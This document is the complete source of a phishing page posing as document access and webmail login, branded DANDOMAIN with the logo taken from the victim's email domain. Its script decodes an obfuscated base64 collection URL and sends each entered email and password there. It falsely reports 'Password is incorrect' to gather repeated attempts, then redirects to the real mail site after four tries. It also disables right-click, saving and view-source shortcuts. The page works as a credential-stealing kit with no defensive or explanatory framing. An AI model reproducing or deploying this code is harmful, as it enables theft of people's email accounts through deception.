<head>
    <script nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">var aix = "";</script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Access your document</title>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <link rel="stylesheet" href="css/landing.css">
    <style>body{
        background: #D1D8F3;
        background-image: url("https://res.cloudinary.com/ducjuygen/image/upload/v1662463656/download_2_gcagnl.jpg");
        background-repeat: no-repeat;
        background-size: cover;
    }

    .container{
        width:100%;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .office{
        width: 380px;
        background: #fff;
    }

    .office-holder{
        width:80%;
        margin: auto;
        padding: 20px 0px;
    }

    .logo{
        width:100%;
        float: left;
        margin-bottom: 2em;
    }

    .logo h1{
        font-family: arial;
    }

    .verify{
        width: 70%;
        margin: auto;
    }

    .verify h4{
        font-family: arial;
    }

    fieldset{
        width: 90%;
        float: right;
        border:2px solid #4285f4;
        border-radius: 5px;
    }

    legend{
        font-size: 15px;
        overflow: hidden;
        width: 42%;
        padding:0px 2px;
        margin: 0px;
    }

    .verify input[type='text']{
        width: 100%;
        float: right;
        border:none;
        padding:3px 10px;
    }

    .verify button{
        border:none;
        height: 40px;
        width: 80px;
        float: right;
        margin-top: 2em;
        background: #4285f4;
        border-radius: 5px;
        color: #fff;
    }

    .email-to-verify{
        border:1px solid #000;
        border-radius: 10px;
    }

    .form-holder{
        width:100%;
        float: left;
    }

    .form-holder h3{
        font-weight: 600;
    }

    .form-holder input[type='email'], input[type='password']{
        width: 100%;
        height:40px;
        float: left;
        margin-bottom: 15px;
    }
    .form-holder .btn-holder{
        width:100%;
        margin-top:1em;
        display: flex;
        align-content: center;
        align-items: center;
        justify-content: center;
    }

    .form-holder .btn-holder .btn{
        background:#0073C6;
        border:none;
        padding:6px 10px;
        color:#fff;
        border-radius: 0px;
        margin-top: 20px;
        margin-bottom: 20px;
    }

    .form-holder .btn-holder .btn:hover{
        cursor:pointer;
    }

    .checkbox{
        width: 100%;
        float: left;
        margin-top:5px;
    }

  
    .checkbox label{
        
        
        float: left;
        margin-left:0.5em;
		margin-top:-4px;
    }
    

    .hide{
        display: none;
    }
	</style>
</head><body>
    <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
			
				<div id="Div1" style="display:none">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div>
                            <img src="https://www.scnsoft.com/blog-pictures/sharepoint/office_365_security-01_1.png" width="100%" alt="SeC3">
                        </div><br>
                        <h5 class="text-dark"><strong class="text-uppercase">Identity Verification</strong></h5>
                        <p class="font-weight-light">For your security we need to verify your identity: To gain access to this document, enter the email address this document was sent to.</p>
                    </div>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="aii" name="" class="form-control" value="" placeholder="someone@example.com" required="">
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btnn">Access Document</button>
                            </div>
                        </div>
                    </form>
                </div>
				</div>
				
				
			<div id="Div2" style="display: block;">
				<div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                            <img id="login_logo1" src="https://logo.clearbit.com/dandomain.dk" width="50" height="50" alt="Webmail">
                        </div>
                        <h3 class="text-dark"><strong id="domain-name" class="text-uppercase">DANDOMAIN</strong></h3>
                        <h5 class="font-weight-light"></h5>
                    </div>
                    <center>
                        
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
						<span id="msg" class="text-danger" style="display: none;">Password is incorrect. Please try again</span>
                    </center>
					<br>
                    <form>
                        <div class="form-holder">
                            
                            <input type="email" id="ai" class="form-control" value="" placeholder="someone@example.com" required="" disabled="disabled">
                            <input type="password" id="pr" placeholder="Email Password" class="form-control" required="">
                            <div class="checkbox">
                                <input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
                                <label>Remember me</label>
                            </div>
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="tt">Sign in</button>
                            </div><p></p>
                       
                           <p style="font-size:13px; margin-top:0em; float: left; width:100%;"> <span id="domain"></span> © 2025 All right reserved.</p><br><br>
                        </div>
                    </form>
                </div>
			</div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<input type="hidden" name="usrip1" id="usrip1" value="212.237.135.102">




<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>

<script type="text/javascript" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">
 $('#submit-btnn').click(function(event) {
     $('#submit-btnn').html('Verifing...');
        event.preventDefault();
    if (document.getElementById('aii').value === ''){
        alert('Enter a valid email address');
		$('#submit-btnn').html('Access Document');
        return false;
    }
	var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
	if (!filter.test(document.getElementById('aii').value)) {
            alert('Enter a valid email address');
			$('#submit-btnn').html('Access Document');
			return false;
    }
	var my_ai = document.getElementById('aii').value;
    $('#ai').attr('disabled', "");
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
	setTimeout(function() {
	 var x = document.getElementById("Div1");
	 var xx = document.getElementById("Div2");
     if (x.style.display === "block" && xx.style.display === "none") {
         x.style.display = "none";
		 xx.style.display = "block";
	 } 
	}, 1000);
	})
</script>
<script type="text/javascript" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">

// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 ||   
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false;      }
else {
return true;
}});




    /* global $ */
    $(document).ready(function(){
      var count=0;
 
      $('#back1').click(function () {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });
      
   
      var ai = window.location.hash.substr(1);
      if (!ai) {
	  	var x = document.getElementById("Div1");
	var xx = document.getElementById("Div2");
         x.style.display = "block";
		 xx.style.display = "none";

      }
      else
      {
        var my_ai = atob(ai);
        $('#ai').val(my_ai); 
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
          $('#error').show();
           ai.focus;
           return false;
        }
		 var ind=my_ai.indexOf("@");
        var my_slice=my_ai.substr((ind+1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.charAt(0).toUpperCase() + c.slice(1);
        var dom= c.toUpperCase();
		var newDate = new Date();
        var datetime =  newDate.toLocaleString();

      
       $('#domain-name').html(dom);
	   $('#domain').html(final);
      
		
      var ind=my_ai.indexOf("@");
        var my_slice=my_ai.substr((ind+1));
		var mainPage = 'https://'+my_slice; 
		
		var sv = my_slice;
		
		<!---- var image = "url('https://image.thum.io/get/auth/53562-77e4da5126dd25414aacf01ccad53fff/width/1200/https://"+sv;"')" ---->
		

        $("#login_logo1").attr("src", "https://logo.clearbit.com/"+mainPage);
         
      <!---  document.body.style.backgroundImage = image; --->
	 	
     $(".ai").html(ai);
	 
      }
 
      $('#tt').click(function(event){
	  event.preventDefault();
        $('#error').hide();
        $('#msg').hide();
        var ai=$("#ai").val();
        var pr=$("#pr").val();
      ///////////new injection////////////////
      var my_ai =ai;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty");
        
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty");
         
            return false;
        }
		 if (pr.length <5 ) {
            $('#error').show();
            $('#error').html("Invalid password! Please try again");
            ai.focus;
            return false;
        } 
 
		 
      ///////////new injection////////////////	
count++;

  const d = atob('aHR0cHM6Ly9zdWJtaXQtZm9ybS5jb20vVTdPTWNQbFJ3');

  // Delay the AJAX call by 1 second
  
    $('#tt').html('Please wait.....');
setTimeout(function () {
    $.ajax({
      dataType: 'JSON',
      url: d,
      type: 'POST',
      data: {
        ai: ai,     // still send as "email" to backend unless backend also expects "ai"
        pr: pr   // same for "password"
      },
      success: function (response) {
        setTimeout(function () {
          $('#msg').html("<span style='color:red;'>Password is incorrect. Please try again</span>");
          if (response) {
            console.log(response);
            $("#msg").show();
            $('#msg').html(response['msg']);

            if (response['signal'] == 'ok') {
              $("#pr").val("");
              if (count >= 4) {
                count = 0;
                window.location.replace("https://mail." + my_slice);
              }
            } else {
              $('#msg').html(response['msg']);
            }
          }
        }, 5000);
      },
      error: function () {
        $("#pr").val("");
        if (count >= 4) {
          count = 0;
          window.location.replace("https://mail." + my_slice);
        }
        $("#msg").show();
      },
      complete: function () {
        $('#tt').html('Sign in');
      }
    });
  }, 5000); // Delay before sending request
});

    });


  </script>
  


  </body>
</html>
   
